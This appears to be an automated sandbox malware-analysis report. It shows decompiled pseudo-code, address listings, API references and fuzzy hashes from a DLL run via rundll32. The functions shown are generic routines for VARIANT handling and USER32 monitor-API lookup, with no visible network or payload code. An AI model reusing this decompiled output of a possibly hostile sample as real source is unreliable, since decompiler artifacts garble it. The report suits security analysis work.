                                                                                                                                  							}
                                                                                                                                  							_t296 = __imp__#6;
                                                                                                                                  							 *_t296( *((intOrPtr*)(_t300 - 0x84)));
                                                                                                                                  							_push( *((intOrPtr*)(_t300 - 0x80)));
                                                                                                                                  							if( *_t293() != 0) {
                                                                                                                                  								_t143 = _t257 + 0xc; // 0xc
                                                                                                                                  								E1001FF59(_t143,  *((intOrPtr*)(_t300 - 0x80)));
                                                                                                                                  							}
                                                                                                                                  							 *_t296( *((intOrPtr*)(_t300 - 0x80)));
                                                                                                                                  							_push( *((intOrPtr*)(_t300 - 0x7c)));
                                                                                                                                  							if( *_t293() != 0) {
                                                                                                                                  								_t147 = _t257 + 0x14; // 0x14
                                                                                                                                  								E1001FF59(_t147,  *((intOrPtr*)(_t300 - 0x7c)));
                                                                                                                                  							}
                                                                                                                                  							 *_t296( *((intOrPtr*)(_t300 - 0x7c)));
                                                                                                                                  							 *((intOrPtr*)(_t257 + 0x10)) =  *((intOrPtr*)(_t300 - 0x78));
                                                                                                                                  							 *((intOrPtr*)(_t257 + 0x1c)) =  *((intOrPtr*)(_t300 - 0x6c));
                                                                                                                                  							 *((intOrPtr*)(_t300 + 0x14)) = _t257;
                                                                                                                                  							E10033135(_t300 + 0x14, 0x100505f8);
                                                                                                                                  							goto L61;
                                                                                                                                  						}
                                                                                                                                  						__imp__#9(_t300 - 0x44);
                                                                                                                                  						_t321 =  *(_t300 + 0xc) - 0x80020009;
                                                                                                                                  						if( *(_t300 + 0xc) == 0x80020009) {
                                                                                                                                  							goto L50;
                                                                                                                                  						}
                                                                                                                                  						_push( *(_t300 + 0xc));
                                                                                                                                  						goto L49;
                                                                                                                                  					} else {
                                                                                                                                  						_t295 =  *(_t300 + 0x18);
                                                                                                                                  						_t293 = (_t203 << 4) +  *((intOrPtr*)(_t300 - 0x54)) - 0x10;
                                                                                                                                  						while(1) {
                                                                                                                                  							_t319 =  *_t295;
                                                                                                                                  							if( *_t295 == 0) {
                                                                                                                                  								goto L46;
                                                                                                                                  							}
                                                                                                                                  							_t230 =  *_t295;
                                                                                                                                  							__eflags = _t230 - 8;
                                                                                                                                  							if(_t230 == 8) {
                                                                                                                                  								L43:
                                                                                                                                  								__imp__#9(_t293);
                                                                                                                                  								L44:
                                                                                                                                  								_t293 = _t293 - 0x10;
                                                                                                                                  								_t295 =  &(_t295[1]);
                                                                                                                                  								__eflags = _t295;
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _t230 - 0xe;
                                                                                                                                  							if(_t230 != 0xe) {
                                                                                                                                  								goto L44;
                                                                                                                                  							}
                                                                                                                                  							goto L43;
                                                                                                                                  						}
                                                                                                                                  						goto L46;
                                                                                                                                  					}
                                                                                                                                  				} else {
                                                                                                                                  					_t290 = 0x10;
                                                                                                                                  					_t291 = _t194 * _t290 >> 0x20;
                                                                                                                                  					_t297 = E100144EC(_t308,  ~(0 | _t308 > 0x00000000) | _t194 * _t290);
                                                                                                                                  					 *((intOrPtr*)(_t300 - 0x54)) = _t297;
                                                                                                                                  					E10030030(_t293, _t297, _t257,  *(_t300 - 0x4c) << 4);
                                                                                                                                  					_t236 =  *(_t300 + 0x18);
                                                                                                                                  					_t277 =  *(_t300 - 0x4c) << 4;
                                                                                                                                  					_t302 = _t302 + 0x10;
                                                                                                                                  					_t36 = _t277 - 0x10; // -16
                                                                                                                                  					_t278 = _t297 + _t36;
                                                                                                                                  					 *(_t300 - 0x14) = _t236;
                                                                                                                                  					 *(_t300 - 0x10) = _t278;
                                                                                                                                  					if( *_t236 == 0) {
                                                                                                                                  						goto L37;
                                                                                                                                  					}
                                                                                                                                  					_t237 =  *((intOrPtr*)(_t300 + 0x1c));
                                                                                                                                  					_t299 =  &(_t278[4]);
                                                                                                                                  					_t258 = _t237 - 4;
                                                                                                                                  					 *(_t300 - 0x1c) = _t299;
                                                                                                                                  					 *((intOrPtr*)(_t300 + 0x1c)) = _t237 + 0xfffffff8;
                                                                                                                                  					do {
                                                                                                                                  						_t240 =  *( *(_t300 - 0x14)) & 0x000000ff;
                                                                                                                                  						_t279 =  *(_t300 - 0x10);
                                                                                                                                  						 *_t279 = _t240;
                                                                                                                                  						if((_t240 & 0x00000040) != 0) {
                                                                                                                                  							 *_t279 = _t240 & 0x0000ffbf | 0x00004000;
                                                                                                                                  						}
                                                                                                                                  						_t241 =  *_t279 & 0x0000ffff;
                                                                                                                                  						_t313 = _t241 - 0x4002;
                                                                                                                                  						if(_t313 > 0) {
                                                                                                                                  							_t242 = _t241 - 0x4003;
                                                                                                                                  							__eflags = _t242 - 0x12;
                                                                                                                                  							if(__eflags > 0) {
                                                                                                                                  								goto L35;
                                                                                                                                  							}
                                                                                                                                  							switch( *((intOrPtr*)(_t242 * 4 +  &M1002E08D))) {
                                                                                                                                  								case 0:
                                                                                                                                  									goto L34;
                                                                                                                                  								case 1:
                                                                                                                                  									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
                                                                                                                                  									_t258 = _t258 + _t293;
                                                                                                                                  									_t244 =  *_t258;
                                                                                                                                  									asm("sbb ecx, ecx");
                                                                                                                                  									 *_t244 =  ~( *_t244) & 0x0000ffff;
                                                                                                                                  									 *_t299 = _t244;
                                                                                                                                  									_t245 = E1002CA61(_t300 - 0x34, _t299, _t244, _t244, 0);
                                                                                                                                  									 *(_t300 - 4) = 3;
                                                                                                                                  									E1002CE83(_t300 - 0x68, _t291, _t300,  *((intOrPtr*)(_t300 - 0x60)), _t245);
                                                                                                                                  									__eflags =  *(_t300 - 0x2c);
                                                                                                                                  									 *(_t300 - 4) = 1;
                                                                                                                                  									if(__eflags != 0) {
                                                                                                                                  										_push( *((intOrPtr*)(_t300 - 0x34)));
                                                                                                                                  										E10014517(_t258, _t291, _t293, _t299, __eflags);
                                                                                                                                  									}
                                                                                                                                  									goto L35;
                                                                                                                                  								case 2:
                                                                                                                                  									goto L35;
                                                                                                                                  							}
                                                                                                                                  						} else {
                                                                                                                                  							if(_t313 == 0) {
                                                                                                                                  								L34:
                                                                                                                                  								 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
                                                                                                                                  								_t258 = _t258 + _t293;
                                                                                                                                  								__eflags = _t258;
                                                                                                                                  								 *_t299 =  *_t258;
                                                                                                                                  								goto L35;
                                                                                                                                  							}
                                                                                                                                  							_t250 = _t241;
                                                                                                                                  							if(_t250 > 0x13) {
                                                                                                                                  								goto L35;
                                                                                                                                  							}
                                                                                                                                  							switch( *((intOrPtr*)(_t250 * 4 +  &M1002E03D))) {
                                                                                                                                  								case 0:
                                                                                                                                  									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                                  									__ebx = __ebx + __edi;
                                                                                                                                  									__ax =  *__ebx;
                                                                                                                                  									goto L28;
                                                                                                                                  								case 1:
                                                                                                                                  									goto L34;
                                                                                                                                  								case 2:
                                                                                                                                  									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
                                                                                                                                  									__eax =  *(__ebp + 0x1c);
                                                                                                                                  									__ebx =  &(__ebx[2]);
                                                                                                                                  									 *__esi =  *( *(__ebp + 0x1c));
                                                                                                                                  									goto L35;
                                                                                                                                  								case 3:
                                                                                                                                  									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
                                                                                                                                  									__eax =  *(__ebp + 0x1c);
                                                                                                                                  									__ebx =  &(__ebx[2]);
                                                                                                                                  									 *__esi =  *( *(__ebp + 0x1c));
                                                                                                                                  									goto L35;
                                                                                                                                  								case 4:
                                                                                                                                  									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                                  									__ebx = __ebx + __edi;
                                                                                                                                  									__eax =  *__ebx;
                                                                                                                                  									goto L17;
                                                                                                                                  								case 5:
                                                                                                                                  									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                                  									__ebx = __ebx + __edi;
                                                                                                                                  									__eax =  *__ebx;
                                                                                                                                  									_push(__eax);
                                                                                                                                  									 *(__ebp - 0x1c) = __eax;
                                                                                                                                  									__imp__#2();
                                                                                                                                  									__eflags =  *(__ebp - 0x1c);
                                                                                                                                  									 *__esi = __eax;
                                                                                                                                  									if(__eflags == 0) {
                                                                                                                                  										goto L35;
                                                                                                                                  									}
                                                                                                                                  									__eflags = __eax;
                                                                                                                                  									if(__eflags != 0) {
                                                                                                                                  										goto L35;
                                                                                                                                  									}
                                                                                                                                  									goto L23;
                                                                                                                                  								case 6:
                                                                                                                                  									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                                  									__ebx = __ebx + __edi;
                                                                                                                                  									 *__ebx =  ~( *__ebx);
                                                                                                                                  									asm("sbb eax, eax");
                                                                                                                                  									L28:
                                                                                                                                  									 *__esi = __ax;
                                                                                                                                  									goto L35;
                                                                                                                                  								case 7:
                                                                                                                                  									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
                                                                                                                                  									__edi =  *(__ebp - 0x10);
                                                                                                                                  									__ebx =  &(__ebx[1]);
                                                                                                                                  									__esi =  *__ebx;
                                                                                                                                  									asm("movsd");
                                                                                                                                  									asm("movsd");
                                                                                                                                  									asm("movsd");
                                                                                                                                  									asm("movsd");
                                                                                                                                  									__esi =  *(__ebp - 0x1c);
                                                                                                                                  									_push(4);
                                                                                                                                  									_pop(__edi);
                                                                                                                                  									goto L35;
                                                                                                                                  								case 8:
                                                                                                                                  									L24:
                                                                                                                                  									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                                  									__ebx = __ebx + __edi;
                                                                                                                                  									__eax =  *__ebx;
                                                                                                                                  									_push(__eax);
                                                                                                                                  									__ecx = __ebp - 0x18;
                                                                                                                                  									 *(__ebp - 0x1c) = __eax;
                                                                                                                                  									__eax = E100200B9(__ebx, __ecx, __edi, __esi, __eflags);
                                                                                                                                  									_push( *(__ebp - 0x18));
                                                                                                                                  									 *((char*)(__ebp - 4)) = 2;
                                                                                                                                  									__imp__#2();
                                                                                                                                  									__eflags =  *(__ebp - 0x1c);
                                                                                                                                  									 *__esi = __eax;
                                                                                                                                  									if( *(__ebp - 0x1c) == 0) {
                                                                                                                                  										L26:
                                                                                                                                  										__ecx =  *(__ebp - 0x18);
                                                                                                                                  										__eax =  *(__ebp - 0x10);
                                                                                                                                  										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
                                                                                                                                  										 *( *(__ebp - 0x10)) = 8;
                                                                                                                                  										 *((char*)(__ebp - 4)) = 1;
                                                                                                                                  										__eax = E100012C0(__ecx);
                                                                                                                                  										goto L35;
                                                                                                                                  									}
                                                                                                                                  									__eflags = __eax;
                                                                                                                                  									if(__eflags == 0) {
                                                                                                                                  										L23:
                                                                                                                                  										__eax = E100201BD(__ecx);
                                                                                                                                  										goto L24;
                                                                                                                                  									}
                                                                                                                                  									goto L26;
                                                                                                                                  								case 9:
                                                                                                                                  									goto L35;
                                                                                                                                  								case 0xa:
                                                                                                                                  									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
                                                                                                                                  									_t258 = _t258 + _t293;
                                                                                                                                  									 *_t299 =  *_t258;
                                                                                                                                  									goto L35;
                                                                                                                                  								case 0xb:
                                                                                                                                  									__eax =  *(__ebp + 0x1c);
                                                                                                                                  									__eax =  *(__ebp + 0x1c) + 8;
                                                                                                                                  									 *(__ebp + 0x1c) = __eax;
                                                                                                                                  									__ebx =  &(__ebx[2]);
                                                                                                                                  									__eflags = __ebx;
                                                                                                                                  									L17:
                                                                                                                                  									__ecx =  *__eax;
                                                                                                                                  									 *__esi = __ecx;
                                                                                                                                  									 *(__esi + 4) = __eax;
                                                                                                                                  									goto L35;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						L35:
                                                                                                                                  						 *(_t300 - 0x10) =  *(_t300 - 0x10) - 0x10;
                                                                                                                                  						_t299 = _t299 - 0x10;
                                                                                                                                  						 *(_t300 - 0x14) =  &(( *(_t300 - 0x14))[1]);
                                                                                                                                  						 *(_t300 - 0x1c) = _t299;
                                                                                                                                  					} while ( *( *(_t300 - 0x14)) != 0);
                                                                                                                                  					_t257 = 0;
                                                                                                                                  					goto L37;
                                                                                                                                  				}
                                                                                                                                  			}

                                                                                                                                  0x1002dc06
                                                                                                                                  0x1002dc06
                                                                                                                                  0x1002dc0a
                                                                                                                                  0x1002dc0d
                                                                                                                                  0x1002dc10
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dc16
                                                                                                                                  0x1002dc1b
                                                                                                                                  0x1002dc1e
                                                                                                                                  0x1002dc24
                                                                                                                                  0x1002dc27
                                                                                                                                  0x1002dc2a
                                                                                                                                  0x1002dc2d
                                                                                                                                  0x1002dc33
                                                                                                                                  0x1002dc36
                                                                                                                                  0x1002dc39
                                                                                                                                  0x1002dc43
                                                                                                                                  0x1002dc43
                                                                                                                                  0x1002dc46
                                                                                                                                  0x1002dc4e
                                                                                                                                  0x1002dc50
                                                                                                                                  0x1002dd6d
                                                                                                                                  0x1002dd72
                                                                                                                                  0x1002dd75
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dd77
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dd7e
                                                                                                                                  0x1002dd81
                                                                                                                                  0x1002dd83
                                                                                                                                  0x1002dd89
                                                                                                                                  0x1002dd93
                                                                                                                                  0x1002dd9a
                                                                                                                                  0x1002dd9c
                                                                                                                                  0x1002dda8
                                                                                                                                  0x1002ddac
                                                                                                                                  0x1002ddb1
                                                                                                                                  0x1002ddb5
                                                                                                                                  0x1002ddb9
                                                                                                                                  0x1002ddbb
                                                                                                                                  0x1002ddbe
                                                                                                                                  0x1002ddc3
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dc56
                                                                                                                                  0x1002dc56
                                                                                                                                  0x1002ddc6
                                                                                                                                  0x1002ddc6
                                                                                                                                  0x1002ddc9
                                                                                                                                  0x1002ddc9
                                                                                                                                  0x1002ddcd
                                                                                                                                  0x00000000
                                                                                                                                  0x1002ddcd
                                                                                                                                  0x1002dc5d
                                                                                                                                  0x1002dc61
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dc67
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dc7c
                                                                                                                                  0x1002dc7f
                                                                                                                                  0x1002dc81
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dca4
                                                                                                                                  0x1002dca8
                                                                                                                                  0x1002dcad
                                                                                                                                  0x1002dcb0
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dcb7
                                                                                                                                  0x1002dcbb
                                                                                                                                  0x1002dcc0
                                                                                                                                  0x1002dcc3
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dcca
                                                                                                                                  0x1002dccd
                                                                                                                                  0x1002dccf
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dcd3
                                                                                                                                  0x1002dcd6
                                                                                                                                  0x1002dcd8
                                                                                                                                  0x1002dcda
                                                                                                                                  0x1002dcdb
                                                                                                                                  0x1002dcde
                                                                                                                                  0x1002dce4
                                                                                                                                  0x1002dce8
                                                                                                                                  0x1002dcea
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dcf0
                                                                                                                                  0x1002dcf2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dd45
                                                                                                                                  0x1002dd48
                                                                                                                                  0x1002dd4c
                                                                                                                                  0x1002dd4e
                                                                                                                                  0x1002dd50
                                                                                                                                  0x1002dd50
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dd55
                                                                                                                                  0x1002dd59
                                                                                                                                  0x1002dd5c
                                                                                                                                  0x1002dd5f
                                                                                                                                  0x1002dd61
                                                                                                                                  0x1002dd62
                                                                                                                                  0x1002dd63
                                                                                                                                  0x1002dd64
                                                                                                                                  0x1002dd65
                                                                                                                                  0x1002dd68
                                                                                                                                  0x1002dd6a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dcfd
                                                                                                                                  0x1002dcfd
                                                                                                                                  0x1002dd00
                                                                                                                                  0x1002dd02
                                                                                                                                  0x1002dd04
                                                                                                                                  0x1002dd05
                                                                                                                                  0x1002dd08
                                                                                                                                  0x1002dd0b
                                                                                                                                  0x1002dd10
                                                                                                                                  0x1002dd13
                                                                                                                                  0x1002dd17
                                                                                                                                  0x1002dd1d
                                                                                                                                  0x1002dd21
                                                                                                                                  0x1002dd23
                                                                                                                                  0x1002dd29
                                                                                                                                  0x1002dd29
                                                                                                                                  0x1002dd2c
                                                                                                                                  0x1002dd2f
                                                                                                                                  0x1002dd32
                                                                                                                                  0x1002dd37
                                                                                                                                  0x1002dd3b
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dd3b
                                                                                                                                  0x1002dd25
                                                                                                                                  0x1002dd27
                                                                                                                                  0x1002dcf8
                                                                                                                                  0x1002dcf8
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dcf8
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dc6e
                                                                                                                                  0x1002dc71
                                                                                                                                  0x1002dc75
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dc89
                                                                                                                                  0x1002dc8c
                                                                                                                                  0x1002dc8f
                                                                                                                                  0x1002dc92
                                                                                                                                  0x1002dc92
                                                                                                                                  0x1002dc95
                                                                                                                                  0x1002dc95
                                                                                                                                  0x1002dc97
                                                                                                                                  0x1002dc9c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dc67
                                                                                                                                  0x1002ddcf
                                                                                                                                  0x1002ddcf
                                                                                                                                  0x1002ddd3
                                                                                                                                  0x1002ddd6
                                                                                                                                  0x1002dddf
                                                                                                                                  0x1002dddf
                                                                                                                                  0x1002dde8
                                                                                                                                  0x00000000
                                                                                                                                  0x1002dde8

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4128688680-0
                                                                                                                                  • Opcode ID: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                                  • Instruction ID: 42fa242583032f4c72b1ee8c19c4a820194bcb4b4a787a5525753aa98076571e
                                                                                                                                  • Opcode Fuzzy Hash: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                                  • Instruction Fuzzy Hash: 5EF18A7490025ADFDF11DFA8D880AEEBBB4FF05300F90406AE951AB2A1D774AE56CF50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                  			E10018B59() {
                                                                                                                                  				void* __ebx;
                                                                                                                                  				void* __esi;
                                                                                                                                  				struct HINSTANCE__* _t5;
                                                                                                                                  				_Unknown_base(*)()* _t6;
                                                                                                                                  				_Unknown_base(*)()* _t7;
                                                                                                                                  				_Unknown_base(*)()* _t8;
                                                                                                                                  				_Unknown_base(*)()* _t9;
                                                                                                                                  				_Unknown_base(*)()* _t10;
                                                                                                                                  				_Unknown_base(*)()* _t11;
                                                                                                                                  				_Unknown_base(*)()* _t12;
                                                                                                                                  				struct HINSTANCE__* _t18;
                                                                                                                                  				void* _t20;
                                                                                                                                  				intOrPtr _t23;
                                                                                                                                  				_Unknown_base(*)()* _t24;
                                                                                                                                  
                                                                                                                                  				_t23 =  *0x100572e4; // 0x0
                                                                                                                                  				if(_t23 == 0) {
                                                                                                                                  					_push(_t20);
                                                                                                                                  					 *0x100572e8 = E10018B01(0, _t20, __eflags);
                                                                                                                                  					_t18 = GetModuleHandleA("USER32");
                                                                                                                                  					__eflags = _t18;
                                                                                                                                  					if(_t18 == 0) {
                                                                                                                                  						L12:
                                                                                                                                  						 *0x100572c8 = 0;
                                                                                                                                  						 *0x100572cc = 0;
                                                                                                                                  						 *0x100572d0 = 0;
                                                                                                                                  						 *0x100572d4 = 0;
                                                                                                                                  						 *0x100572d8 = 0;
                                                                                                                                  						 *0x100572dc = 0;
                                                                                                                                  						 *0x100572e0 = 0;
                                                                                                                                  						_t5 = 0;
                                                                                                                                  					} else {
                                                                                                                                  						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
                                                                                                                                  						__eflags = _t6;
                                                                                                                                  						 *0x100572c8 = _t6;
                                                                                                                                  						if(_t6 == 0) {
                                                                                                                                  							goto L12;
                                                                                                                                  						} else {
                                                                                                                                  							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
                                                                                                                                  							__eflags = _t7;
                                                                                                                                  							 *0x100572cc = _t7;
                                                                                                                                  							if(_t7 == 0) {
                                                                                                                                  								goto L12;
                                                                                                                                  							} else {
                                                                                                                                  								_t8 = GetProcAddress(_t18, "MonitorFromRect");
                                                                                                                                  								__eflags = _t8;
                                                                                                                                  								 *0x100572d0 = _t8;
                                                                                                                                  								if(_t8 == 0) {
                                                                                                                                  									goto L12;
                                                                                                                                  								} else {
                                                                                                                                  									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
                                                                                                                                  									__eflags = _t9;
                                                                                                                                  									 *0x100572d4 = _t9;
                                                                                                                                  									if(_t9 == 0) {
                                                                                                                                  										goto L12;
                                                                                                                                  									} else {
                                                                                                                                  										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
                                                                                                                                  										__eflags = _t10;
                                                                                                                                  										 *0x100572dc = _t10;
                                                                                                                                  										if(_t10 == 0) {
                                                                                                                                  											goto L12;
                                                                                                                                  										} else {
                                                                                                                                  											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
                                                                                                                                  											__eflags = _t11;
                                                                                                                                  											 *0x100572d8 = _t11;
                                                                                                                                  											if(_t11 == 0) {
                                                                                                                                  												goto L12;
                                                                                                                                  											} else {
                                                                                                                                  												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
                                                                                                                                  												__eflags = _t12;
                                                                                                                                  												 *0x100572e0 = _t12;
                                                                                                                                  												if(_t12 == 0) {
                                                                                                                                  													goto L12;
                                                                                                                                  												} else {
                                                                                                                                  													_t5 = 1;
                                                                                                                                  													__eflags = 1;
                                                                                                                                  												}
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					 *0x100572e4 = 1;
                                                                                                                                  					return _t5;
                                                                                                                                  				} else {
                                                                                                                                  					_t24 =  *0x100572d8; // 0x0
                                                                                                                                  					return 0 | _t24 != 0x00000000;
                                                                                                                                  				}
                                                                                                                                  			}


















                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,754A7F34,10018CA5,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B82
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B9E
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BAF
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BC0
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BD1
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BE2
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BF3
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018C04
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                  • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                                  • API String ID: 667068680-68207542
                                                                                                                                  • Opcode ID: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                                  • Instruction ID: 77f58ff47d83721d02e0aa712f7cb6554a3c60b1de10c844b6b889dbd48dd915
                                                                                                                                  • Opcode Fuzzy Hash: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                                  • Instruction Fuzzy Hash: 40213071902121AAE751DF25ADC046DBAEAF349280F61093FF10CD6560D7309AC6AFA9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                  			E1002A778(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				int _v28;
                                                                                                                                  				intOrPtr _v32;
                                                                                                                                  				intOrPtr _v36;
                                                                                                                                  				intOrPtr _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				struct HWND__* _v52;
                                                                                                                                  				signed int _t139;
                                                                                                                                  				signed int _t141;
                                                                                                                                  				void* _t142;
                                                                                                                                  				signed int _t146;
                                                                                                                                  				signed int _t149;
                                                                                                                                  				intOrPtr _t150;
                                                                                                                                  				signed int _t152;
                                                                                                                                  				signed char _t153;
                                                                                                                                  				signed int _t154;
                                                                                                                                  				signed int _t155;
                                                                                                                                  				int _t156;
                                                                                                                                  				signed int _t161;
                                                                                                                                  				signed int _t165;
                                                                                                                                  				void* _t167;
                                                                                                                                  				signed char _t171;
                                                                                                                                  				signed int _t172;
                                                                                                                                  				signed int _t173;
                                                                                                                                  				signed int _t174;
                                                                                                                                  				signed char _t182;
                                                                                                                                  				intOrPtr _t183;
                                                                                                                                  				signed int _t184;
                                                                                                                                  				short _t188;
                                                                                                                                  				signed int _t189;
                                                                                                                                  				signed int _t190;
                                                                                                                                  				signed int _t191;
                                                                                                                                  				signed int _t195;
                                                                                                                                  				signed int _t198;
                                                                                                                                  				signed char _t199;
                                                                                                                                  				signed int _t200;
                                                                                                                                  				signed int _t201;
                                                                                                                                  				short _t204;
                                                                                                                                  				signed int _t206;
                                                                                                                                  				signed int _t207;
                                                                                                                                  				signed int _t208;
                                                                                                                                  				signed int _t209;
                                                                                                                                  				void* _t211;
                                                                                                                                  				signed int _t215;
                                                                                                                                  				signed int _t216;
                                                                                                                                  				struct HWND__* _t217;
                                                                                                                                  				struct tagMSG* _t221;
                                                                                                                                  				intOrPtr _t224;
                                                                                                                                  				void* _t231;
                                                                                                                                  				struct tagMSG* _t240;
                                                                                                                                  				signed int _t242;
                                                                                                                                  				int _t243;
                                                                                                                                  				signed int _t244;
                                                                                                                                  				long _t247;
